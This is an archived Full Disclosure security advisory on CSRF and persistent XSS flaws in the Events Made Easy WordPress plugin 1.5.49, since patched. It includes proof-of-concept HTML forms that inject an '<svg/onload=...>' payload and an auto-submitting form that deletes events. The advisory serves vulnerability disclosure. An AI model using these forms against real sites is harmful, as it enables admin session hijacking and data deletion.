[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] Events Made Easy WordPress plugin CSRF + Persistent XSS
- To: fulldisclosure@xxxxxxxxxxxx, bugs@xxxxxxxxxxxxxxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx, vuln@xxxxxxxxxxx
- Subject: [FD] Events Made Easy WordPress plugin CSRF + Persistent XSS
- From: David Sopas <davidsopas@xxxxxxxxx>
- Date: Fri, 16 Oct 2015 09:39:09 +0100
Plugin link: https://wordpress.org/plugins/events-made-easy/
Active Installs: 10,000+
Version tested: 1.5.49
CVE Reference: Waiting
Original advisory:
https://www.davidsopas.com/events-made-easy-wordpress-plugin-csrf-persistent-xss/
Events Made Easy is a full-featured event management solution for
WordPress. Events Made Easy supports public, private, draft and recurring
events, locations management, RSVP (+ optional approval), Paypal,
2Checkout, FirstData and Google maps. With Events Made Easy you can plan
and publish your event, or let people reserve spaces for your weekly
meetings. You can add events list, calendars and description to your blog
using multiple sidebar widgets or shortcodes; if you are a web designer you
can simply employ the template tags provided by Events Made Easy.
When playing around with this plugin I noticed a couple of vulnerabilities.
In my opinion they are critical because they can could cause damage to a
WordPress installation.
All of them are related to CSRF where the vendor forgot to place a security
token (wp_nonce) on the affected forms.
#1 Add template CSRF + Persistent XSS
URL: /wp-admin/admin.php?page=eme-templates
If a authenticated admin clicks on the “Add template” button on a html with
this code:
<form action="https://victims_website/wp-admin/admin.php?page=eme-templates"
method="POST">
<input type="hidden" name="eme_admin_action" value="do_addtemplate" />
<input type="hidden" name="description" value="<svg/onload=confirm(1)>" />
<input type="hidden" name="format" value="csrf" />
<input type="submit" name="submit" value="Add template" />
</form>
It will add a Persistent XSS vector on the template description field. This
field is automatically executed when the admin visits the page
admin.php?page=eme-templates.
Possible attack scenario:
Malicious user checks that Events Made Easy is installed on a WordPress
installation
Malicious sends admin a link to the page that has a auto-submit form
with a XSS vector that hijacks victims browser
Victim visits the page and gets hijacked
#2 Add Form Field CSRF + Persistent XSS
URL: /wp-admin/admin.php?page=eme-formfields
If a authenticated admin clicks on the “Add field” button on a html with
this code:
<form action="https://victims_website/wp-admin/admin.php?page=eme-formfields"
method="POST">
<input type="hidden" name="eme_admin_action" value="do_addformfield" />
<input type="hidden" name="field_name" value="<svg/onload=confirm(1)>" />
<input type="hidden" name="field_type" value="1" />
<input type="hidden" name="field_info" value="csrf" />
<input type="hidden" name="field_tags" value="csrf" />
<input type="submit" name="submit" value="Add field" />
</form>
Like vulnerability #1 the attack scenario is the same. Same issue affects
form fields on this plugin.
#3 Remove events older than CSRF
URL: /wp-admin/admin.php?page=eme-cleanup
With this CSRF a malicious user could delete all the events older than a
certain number.
In my proof of concept I used a auto-submit form that could also be used in
vulnerabilities #1 and #2.
<form action="https://victims_website/wp-admin/admin.php?page=eme-cleanup"
name="dsopas" method="POST">
<input type="hidden" name="page" value="eme-cleanup" />
<input type="hidden" name="eme_admin_action" value="eme_cleanup" />
<input type="hidden" name="eme_number" value="1" />
<input type="hidden" name="eme_period" value="day" />
<input type="hidden" name="doaction" value="Apply" />
</form> <script> document.dsopas.submit(); </script>
Possible attack scenario:
Malicious user checks that Events Made Easy is installed on a WordPress
installation
Malicious sends admin a link to the page that has this auto-submit form
Without victim noticing, events older than 1 day will be removed.
Solution:
Vendor in a matter of few hours launched a patched version – 1.5.50. Also
he was kind enough to put my name on the changelog.
*-David Sopas*
*davidsopas.com <https://www.davidsopas.com>*
*@dsopas <https://www.twitter.com/dsopas>*
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/